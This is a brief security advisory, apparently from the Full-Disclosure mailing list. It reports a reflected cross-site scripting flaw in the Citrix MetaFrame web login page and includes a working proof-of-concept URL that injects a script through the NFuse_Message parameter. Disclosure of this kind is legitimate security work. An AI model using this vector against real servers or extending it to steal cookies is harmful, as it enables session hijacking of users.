Citrix MetaFrame remote xss Author: handrix Contact: handrix_at_morx_dot_org Vulnerability: Cross Site Scripting Severity: Medium/High MorX security research team www.morx.org
The Citrix MetaFrame web manager are vulnerable to XSS attack. XSS Vector : http://server/Citrix/MetaFrameXP/default/login.asp?NFuse_LogoutId=Off&NFuse_MessageType=warning&NFuse_Message=%3Cscript%3Ealert(document.cookie);%3C/script%3E
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/